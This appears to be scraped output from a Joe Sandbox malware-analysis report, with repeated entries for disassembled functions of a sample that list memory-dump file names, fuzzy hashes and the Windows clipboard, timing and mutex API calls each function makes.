Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekRectUnlockWindow
String ID:
API String ID: 1900757344-0
Opcode ID: 3fedac06c96fe0384ca4b98b5effc49122582b86d66ccfd62ecd7f0a2551abfb
Instruction ID: 167198eaf43535dc6ed42d9b65a573ab203947f0260dd1b76ec50b66d701c9e2
Opcode Fuzzy Hash: 3fedac06c96fe0384ca4b98b5effc49122582b86d66ccfd62ecd7f0a2551abfb
Instruction Fuzzy Hash: D5916F32205B4486FB6B8B27E8847EA77A1F74DBE4F540116EB5987AF5DB38C881C701

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140037653 Relevance: 9.2, APIs: 6, Instructions: 175windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 14a1b90f6deac4f37833dcb980ec153e8a0b425d2c144e3d5ce9291e422aec63
Instruction ID: ab592efdaf8b961dd773a833f588af74de7c1b7b115bbfb0ee371845e1c37c7c
Opcode Fuzzy Hash: 14a1b90f6deac4f37833dcb980ec153e8a0b425d2c144e3d5ce9291e422aec63
Instruction Fuzzy Hash: BD916132205B4486FB6B8B27E8847EA77A1F74DBE4F540116EB99476F5DB38C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140037A86 Relevance: 9.2, APIs: 6, Instructions: 175windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 111943ff7495a3cbf6b3982680ea8fb40b0a81d4bc98d824b0129cf8b5a89b4d
Instruction ID: 0b72f5d55827f1b54b2b187232eac8efbeb0913775c11e468b83baa82e10e95a
Opcode Fuzzy Hash: 111943ff7495a3cbf6b3982680ea8fb40b0a81d4bc98d824b0129cf8b5a89b4d
Instruction Fuzzy Hash: B8916F32205B4486FB6B8B27E8847EA77A1F74DBE4F540116EB5987AF5DB38C881C740

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140035DA5 Relevance: 9.2, APIs: 6, Instructions: 175windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 000000014005B7B0: wcsncpy.LIBCMT ref: 000000014005B7E5

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlockwcsncpy
String ID:
API String ID: 3258626421-0
Opcode ID: 35a46504e7700142afa45c779c4f3af919320cc5ad64bd5e42c719824d66ae38
Instruction ID: a945119d2551b7416cd6bc3befe89842b3a5641019a7341cd0cd17fd01f8e6bf
Opcode Fuzzy Hash: 35a46504e7700142afa45c779c4f3af919320cc5ad64bd5e42c719824d66ae38
Instruction Fuzzy Hash: A4915032205B4486FB6B8B27E8847EA77A1F74DBE4F540116EB59476F5DB38C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140037F26 Relevance: 9.2, APIs: 6, Instructions: 175windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: a007a2a408687f9487b831d9485a07a67b51783b9008b2de7d8779fbbed4160d
Instruction ID: d0525a5d4f71d4fb2415e92aea7ac0f7d525be29a20f60233c191e911e304a20
Opcode Fuzzy Hash: a007a2a408687f9487b831d9485a07a67b51783b9008b2de7d8779fbbed4160d
Instruction Fuzzy Hash: F0915032205B4486FB6B8B27E8847EA77A1F74DBE4F540116EB59476F5DB38C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400385C1 Relevance: 9.2, APIs: 6, Instructions: 174windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: b5d317aa164714858a996f2847591bfbc86cbe31d4ca03bc69ca62310b56ccc2
Instruction ID: 07eefa78f9c7b21627365e5b993660bfdc319645098274bb9be06cfcc4bcb8d1
Opcode Fuzzy Hash: b5d317aa164714858a996f2847591bfbc86cbe31d4ca03bc69ca62310b56ccc2
Instruction Fuzzy Hash: 7C817032605B4086FB6B8B27E8947EA37A1F74DBE4F540116EB5987AF5DB38C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000014003765C Relevance: 9.2, APIs: 6, Instructions: 174windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: ba47faa52f61d1a6c298c8f5faee011ae2575060e31064b7a1943995185ee55c
Instruction ID: e901d4af2f12c7d52fc653d81f57f544f79ea35346a68133ffd8ba4b9afa5326
Opcode Fuzzy Hash: ba47faa52f61d1a6c298c8f5faee011ae2575060e31064b7a1943995185ee55c
Instruction Fuzzy Hash: 39816132205B4486FB6B8B27E8847EA37A1F74DBE4F540116EB5987AF5DB38C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140035F4D Relevance: 9.2, APIs: 6, Instructions: 174windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Part of subcall function 0000000140015020: CloseHandle.KERNEL32 ref: 00000001400150EE
Part of subcall function 0000000140015020: CreateMutexW.KERNEL32 ref: 00000001400150FF
Part of subcall function 0000000140015020: GetLastError.KERNEL32 ref: 0000000140015108
Part of subcall function 0000000140015020: GetWindowThreadProcessId.USER32 ref: 00000001400151C4

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$Close$ClipboardCreateErrorGlobalHandleLastMessageMutexPeekProcessThreadUnlockWindow
String ID:
API String ID: 4284707085-0
Opcode ID: abab58e33397804e7ca832c9cec14a5634ff7a8bf431317acd29c962a879c5de
Instruction ID: d78d864a8fb7317adcc8efcde7875a8835dc1b9b714ef9cc0c0d3126ce129f33
Opcode Fuzzy Hash: abab58e33397804e7ca832c9cec14a5634ff7a8bf431317acd29c962a879c5de
Instruction Fuzzy Hash: B9817132605B4086FB6B8B27E8947EA37A1F74DBE4F540116EB5987AF5DB38C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140035F7D Relevance: 9.2, APIs: 6, Instructions: 174windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Part of subcall function 0000000140015020: CloseHandle.KERNEL32 ref: 00000001400150EE
Part of subcall function 0000000140015020: CreateMutexW.KERNEL32 ref: 00000001400150FF
Part of subcall function 0000000140015020: GetLastError.KERNEL32 ref: 0000000140015108
Part of subcall function 0000000140015020: GetWindowThreadProcessId.USER32 ref: 00000001400151C4

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$Close$ClipboardCreateErrorGlobalHandleLastMessageMutexPeekProcessThreadUnlockWindow
String ID:
API String ID: 4284707085-0
Opcode ID: 641e2052bc6f952e362d3f81701144c101028e716ef370a831786f467867b599
Instruction ID: 2b04464fbb2ccf9b4f66e093a80550d5a897be58982393dfbf5d4f8799554d6c
Opcode Fuzzy Hash: 641e2052bc6f952e362d3f81701144c101028e716ef370a831786f467867b599
Instruction Fuzzy Hash: 71818232605B4086FB6B8B27E8947EA37A1F74DBE4F540116EB5987AF5CB38C881C740

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140038476 Relevance: 9.2, APIs: 6, Instructions: 173windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 8957dc32085d417736f4e2f17010cb25067ef12b609390843b72179b89f7ddce
Instruction ID: dd3a3e0e5562110f650620b503a10697ef5710b1546decce0d06356b656f45b3
Opcode Fuzzy Hash: 8957dc32085d417736f4e2f17010cb25067ef12b609390843b72179b89f7ddce
Instruction Fuzzy Hash: DF816F32205B4486FB6B8B27E8847EA37A1F74DBE4F540116EB5987AF5DB38C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400386DA Relevance: 9.2, APIs: 6, Instructions: 173windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00000001400A91F0: GetFullPathNameW.KERNEL32(?,?,?,00000001400386FB), ref: 00000001400A9249
Part of subcall function 00000001400A91F0: GetPrivateProfileStringW.KERNEL32 ref: 00000001400A9285

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseFullGlobalMessageNamePathPeekPrivateProfileStringUnlock
String ID:
API String ID: 3404763234-0
Opcode ID: 9cd3f22d3c6dc66cc047d7df66a14a2580822a26a3cc46f1d3918d67015479db
Instruction ID: 55db884b1ec517b11f0bb6b5b56825d4ee5bb38a1dd10fc72c5cd0f4e8ab41a9
Opcode Fuzzy Hash: 9cd3f22d3c6dc66cc047d7df66a14a2580822a26a3cc46f1d3918d67015479db
Instruction Fuzzy Hash: 64816F32205B4486FB6B8B27E8847EA37A1F74DBE4F540116EB5987AF5DB38C881C741

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140036C47 Relevance: 9.2, APIs: 6, Instructions: 173windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: f0a76f5ad3ef98fa211b7ff92082da5ea2af6aeef1ad13f0413d93ca74929cb6
Instruction ID: a93d2e1772e68bf1e6096105bf789f996495b749b206010035d773d0db8bace4
Opcode Fuzzy Hash: f0a76f5ad3ef98fa211b7ff92082da5ea2af6aeef1ad13f0413d93ca74929cb6
Instruction Fuzzy Hash: 4D816F32205B4486FB6B8B27E8847EA37A1F74DBE4F540116EB5987AF5DB38C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140036D2A Relevance: 9.2, APIs: 6, Instructions: 173windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 000000014004F4F0: GetWindowTextLengthW.USER32 ref: 000000014004F51E

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalLengthMessagePeekTextUnlockWindow
String ID:
API String ID: 1215013059-0
Opcode ID: 30585c8da64c7377c30960d6a69d8a1eb46f246b2ac77c483522f3caf1a3373a
Instruction ID: 93afb9150833a3eabb7e22c4cce54f6ceb6bfb214cad87b1d1cd9fec1f7c2293
Opcode Fuzzy Hash: 30585c8da64c7377c30960d6a69d8a1eb46f246b2ac77c483522f3caf1a3373a
Instruction Fuzzy Hash: 95816F32205B4486FB6B8B27E8847EA37A1F74DBE4F540116EB5987AF5DB38C881C741

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140036D50 Relevance: 9.2, APIs: 6, Instructions: 173windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 3337cf6e4e750bf271e437af7c08d3d5a64fb82be24c0b5c00f760a07409464d
Instruction ID: 1d812a0a90c98a5882d68d9aa1469116f00cdf094e899db973c60e69878b9b86
Opcode Fuzzy Hash: 3337cf6e4e750bf271e437af7c08d3d5a64fb82be24c0b5c00f760a07409464d
Instruction Fuzzy Hash: 4F816F32205B4486FB6B8B27E8847EA37A1F74DBE4F540116EB5987AF5DB38C881C741

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400374D5 Relevance: 9.2, APIs: 6, Instructions: 173windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 000000014005F430: wcsncpy.LIBCMT ref: 000000014005F489
Part of subcall function 000000014005F430: SetVolumeLabelW.KERNEL32 ref: 000000014005F4D4

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
